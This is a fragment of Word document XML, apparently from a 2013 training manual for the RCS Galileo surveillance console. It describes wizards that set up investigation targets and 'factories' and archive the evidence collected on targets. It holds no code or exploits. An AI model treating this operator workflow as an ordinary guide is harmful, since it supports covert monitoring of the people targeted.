              </w:rPr>
              <w:t>Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5812" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00E721EE" w:rsidRDefault="00E721EE" w:rsidP="00F64671">
            <w:pPr>
              <w:jc w:val="left"/>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E721EE" w:rsidTr="0099641A">
        <w:trPr>
          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
          <w:trHeight w:val="2401"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1666" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00E721EE" w:rsidRPr="00E721EE" w:rsidRDefault="00E721EE" w:rsidP="00F64671">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E721EE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Investigation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5812" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00EE3A49" w:rsidRDefault="00EE3A49" w:rsidP="00EE3A49">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The Investigation Wizard allows to immediately prepare all the RCS Console elements needed to work on a new investigation.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00EE3A49" w:rsidRDefault="00EE3A49" w:rsidP="00EE3A49">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00E721EE" w:rsidRDefault="00EE3A49" w:rsidP="0099641A">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>The Wizard will automatically create a new</w:t>
            </w:r>
            <w:r w:rsidR="0099641A">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> Group, Operation, Target and Factory based on the name provided.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00DA06EB" w:rsidRDefault="00DA06EB" w:rsidP="00F2314A">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0099641A" w:rsidRDefault="007F0CD9" w:rsidP="0099641A">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:highlight w:val="yellow"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251875328" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1FE5BF06" wp14:editId="4BDE15AE">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>4892040</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="margin">
              <wp:posOffset>2924175</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1151890" cy="1079500"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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151890" cy="1079500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Tabellagriglia4-colore1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="30" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1666"/>
        <w:gridCol w:w="5812"/>
      </w:tblGrid>
      <w:tr w:rsidR="0099641A" w:rsidTr="00F64671">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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0099641A" w:rsidRDefault="0099641A" w:rsidP="00F64671">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5812" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0099641A" w:rsidRPr="00197088" w:rsidRDefault="0099641A" w:rsidP="00F64671">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00197088">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0099641A" w:rsidTr="00F64671">
        <w:trPr>
          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
          <w:trHeight w:val="2401"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1666" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0099641A" w:rsidRPr="00E721EE" w:rsidRDefault="0099641A" w:rsidP="00F64671">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Archive</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5812" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0099641A" w:rsidRPr="00197088" w:rsidRDefault="0099641A" w:rsidP="00F64671">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00197088">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The </w:t>
            </w:r>
            <w:r w:rsidR="00071661" w:rsidRPr="00197088">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Archive</w:t>
            </w:r>
            <w:r w:rsidRPr="00197088">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> Wizard allows to </w:t>
            </w:r>
            <w:r w:rsidR="00071661" w:rsidRPr="00197088">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">quickly </w:t>
            </w:r>
            <w:r w:rsidR="00CC5E23" w:rsidRPr="00197088">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">save Operations </w:t>
            </w:r>
            <w:r w:rsidR="00197088" w:rsidRPr="00197088">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">and </w:t>
            </w:r>
            <w:r w:rsidR="00CC5E23" w:rsidRPr="00197088">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Targets evidences</w:t>
            </w:r>
            <w:r w:rsidR="00197088" w:rsidRPr="00197088">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> into backups.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0099641A" w:rsidRPr="00197088" w:rsidRDefault="0099641A" w:rsidP="00F64671">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="0099641A" w:rsidRPr="00197088" w:rsidRDefault="0099641A" w:rsidP="00BB339D">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00197088">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The Wizard </w:t>
            </w:r>
            <w:r w:rsidR="00197088" w:rsidRPr="00197088">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>also allow</w:t>
            </w:r>
            <w:r w:rsidR="00483386">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>s</w:t>
            </w:r>
            <w:r w:rsidR="00197088" w:rsidRPr="00197088">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> to </w:t>
            </w:r>
            <w:r w:rsidR="00BB339D">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>perform secondary activities like items deletion and status changing.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0099641A" w:rsidRDefault="0099641A" w:rsidP="00F2314A">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0099641A" w:rsidRDefault="0099641A">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0099641A" w:rsidRDefault="0099641A">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sectPr w:rsidR="0099641A" w:rsidSect="00CE07E2">
          <w:headerReference w:type="default" r:id="rId377"/>
          <w:pgSz w:w="11906" w:h="16838" w:code="9"/>
          <w:pgMar w:top="1418" w:right="1134" w:bottom="1134" w:left="1134" w:header="709" w:footer="709" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F5F5B" w:rsidRPr="00C813BF" w:rsidRDefault="005F5F5B" w:rsidP="00C813BF">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>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 w:rsidR="005F5F5B" w:rsidRPr="00C813BF" w:rsidRDefault="005F5F5B" w:rsidP="00C813BF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>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Pr="00C813BF" w:rsidRDefault="005F5F5B" w:rsidP="00C813BF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F5F5B" w:rsidRDefault="005F5F5B" w:rsidP="005F5F5B">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00110FA5">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251866112" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2E40B0F6" wp14:editId="02D18D49">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>3737610</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>116205</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2422525" cy="428625"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>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2422525" cy="428625"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5F5B" w:rsidRDefault="005F5F5B" w:rsidP="005F5F5B">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F5F5B" w:rsidRDefault="005F5F5B" w:rsidP="005F5F5B">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F5F5B" w:rsidRPr="005B0D17" w:rsidRDefault="005F5F5B" w:rsidP="005F5F5B">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F5F5B" w:rsidRPr="00302700" w:rsidRDefault="005F5F5B" w:rsidP="005F5F5B">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302700">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RELEASE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> DATE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5F5B" w:rsidRDefault="005F5F5B" w:rsidP="005F5F5B">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302700">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Nov 1</w:t>
      </w:r>
      <w:r w:rsidR="00622C74">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidR="007E7F27">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00302700">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2013</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2314A" w:rsidRPr="00205C0F" w:rsidRDefault="005F5F5B" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302700">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251864064" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="35F4029A" wp14:editId="6D14AAA1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4200525" cy="2361565"/>
            <wp:effectExtent l="0" t="0" r="9525" b="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lileo_Splash.pn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4200525" cy="2361565"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00F2314A" w:rsidRPr="00205C0F" w:rsidSect="00CE07E2">
      <w:headerReference w:type="default" r:id="rId379"/>
      <w:footerReference w:type="default" r:id="rId380"/>
      <w:pgSz w:w="11906" w:h="16838"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380" w:rsidRDefault="003A4380" w:rsidP="002F634E">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="003A4380" w:rsidRDefault="003A4380" w:rsidP="002F6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Default="0029192C" w:rsidP="004A1B81"/>
  <w:p w:rsidR="0029192C" w:rsidRDefault="0029192C" w:rsidP="004A1B81"/>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9192C" w:rsidTr="008A00CA">
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3209" w:type="dxa"/>
        </w:tcPr>
        <w:p w:rsidR="0029192C" w:rsidRDefault="0029192C" w:rsidP="004A1B81">
          <w:pPr>
            <w:pStyle w:val="Pidipagina"/>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3209" w:type="dxa"/>
        </w:tcPr>
        <w:p w:rsidR="0029192C" w:rsidRDefault="0029192C" w:rsidP="004A1B81">
          <w:pPr>
            <w:pStyle w:val="Pidipagina"/>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3210" w:type="dxa"/>
        </w:tcPr>
        <w:p w:rsidR="0029192C" w:rsidRDefault="0029192C" w:rsidP="004A1B81">
          <w:pPr>
            <w:pStyle w:val="Pidipagina"/>
            <w:jc w:val="right"/>
          </w:pPr>
          <w:r w:rsidRPr="008C699B">
            <w:rPr>
              <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
            </w:rPr>
            <w:t xml:space="preserve">Pag. </w:t>
          </w:r>
          <w:r w:rsidRPr="008C699B">
            <w:rPr>
              <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="008C699B">
            <w:rPr>
              <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
            </w:rPr>
            <w:instrText>PAGE   \* MERGEFORMAT</w:instrText>
          </w:r>
          <w:r w:rsidRPr="008C699B">
            <w:rPr>
              <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="0058357F">
            <w:rPr>
              <w:noProof/>
              <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
            </w:rPr>
            <w:t>22</w:t>
          </w:r>
          <w:r w:rsidRPr="008C699B">
            <w:rPr>
              <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:tc>
    </w:tr>
  </w:tbl>
  <w:p w:rsidR="0029192C" w:rsidRPr="004A1B81" w:rsidRDefault="0029192C" w:rsidP="004A1B81">
    <w:pPr>
      <w:pStyle w:val="Pidipagina"/>
      <w:tabs>
        <w:tab w:val="clear" w:pos="4819"/>
        <w:tab w:val="clear" w:pos="9638"/>
        <w:tab w:val="left" w:pos="771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897522" w:rsidRDefault="0029192C" w:rsidP="0089752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380" w:rsidRDefault="003A4380" w:rsidP="002F634E">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="003A4380" w:rsidRDefault="003A4380" w:rsidP="002F6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051467">
    <w:pPr>
      <w:pStyle w:val="Intestazione"/>
      <w:jc w:val="right"/>
    </w:pPr>
  </w:p>
  <w:p w:rsidR="0029192C" w:rsidRPr="00110FA5" w:rsidRDefault="0029192C" w:rsidP="00051467">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2"/>
    </w:tblGrid>
    <w:tr w:rsidR="0029192C" w:rsidRPr="00110FA5" w:rsidTr="00240B6F">
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="4889" w:type="dxa"/>
          <w:vAlign w:val="center"/>
        </w:tcPr>
        <w:p w:rsidR="0029192C" w:rsidRPr="00110FA5" w:rsidRDefault="0029192C" w:rsidP="00051467">
          <w:pPr>
            <w:pStyle w:val="RCSTrainingManual-Section"/>
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00110FA5">
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:t>RCS Galileo</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="0029192C" w:rsidRPr="00110FA5" w:rsidRDefault="0029192C" w:rsidP="00051467">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051467">
          <w:pPr>
            <w:pStyle w:val="Intestazione"/>
            <w:jc w:val="right"/>
          </w:pPr>
          <w:r w:rsidRPr="00110FA5">
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51DE9225" wp14:editId="62996490">
                <wp:extent cx="2422922" cy="428625"/>
                <wp:effectExtent l="0" t="0" r="0"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87756C">
    <w:pPr>
      <w:pStyle w:val="Intestazione"/>
      <w:jc w:val="right"/>
    </w:pPr>
  </w:p>
  <w:p w:rsidR="0029192C" w:rsidRPr="00110FA5" w:rsidRDefault="0029192C" w:rsidP="0087756C">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861"/>
    </w:tblGrid>
    <w:tr w:rsidR="0029192C" w:rsidRPr="00110FA5" w:rsidTr="00134262">
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="4889" w:type="dxa"/>
          <w:vAlign w:val="center"/>
        </w:tcPr>
        <w:p w:rsidR="0029192C" w:rsidRPr="00110FA5" w:rsidRDefault="0029192C" w:rsidP="00D618FA">
          <w:pPr>
            <w:pStyle w:val="RCSTrainingManual-Section"/>
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00110FA5">
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:t>Dashboard and Alerting</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="0029192C" w:rsidRPr="00110FA5" w:rsidRDefault="0029192C" w:rsidP="0087756C">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87756C">
          <w:pPr>
            <w:pStyle w:val="Intestazione"/>
            <w:jc w:val="right"/>
          </w:pPr>
          <w:r w:rsidRPr="00110FA5">
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E8D45B5" wp14:editId="4CB8147C">
                <wp:extent cx="2422922" cy="428625"/>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87756C">
    <w:pPr>
      <w:pStyle w:val="Intestazione"/>
      <w:jc w:val="right"/>
    </w:pPr>
  </w:p>
  <w:p w:rsidR="0029192C" w:rsidRPr="00110FA5" w:rsidRDefault="0029192C" w:rsidP="0087756C">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7"/>
    </w:tblGrid>
    <w:tr w:rsidR="0029192C" w:rsidRPr="00110FA5" w:rsidTr="00134262">
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="4889" w:type="dxa"/>
          <w:vAlign w:val="center"/>
        </w:tcPr>
        <w:p w:rsidR="0029192C" w:rsidRPr="00110FA5" w:rsidRDefault="0029192C" w:rsidP="00D618FA">
          <w:pPr>
            <w:pStyle w:val="RCSTrainingManual-Section"/>
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00110FA5">
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:t>System Maintenance</w:t>
          </w:r>
        </w:p>
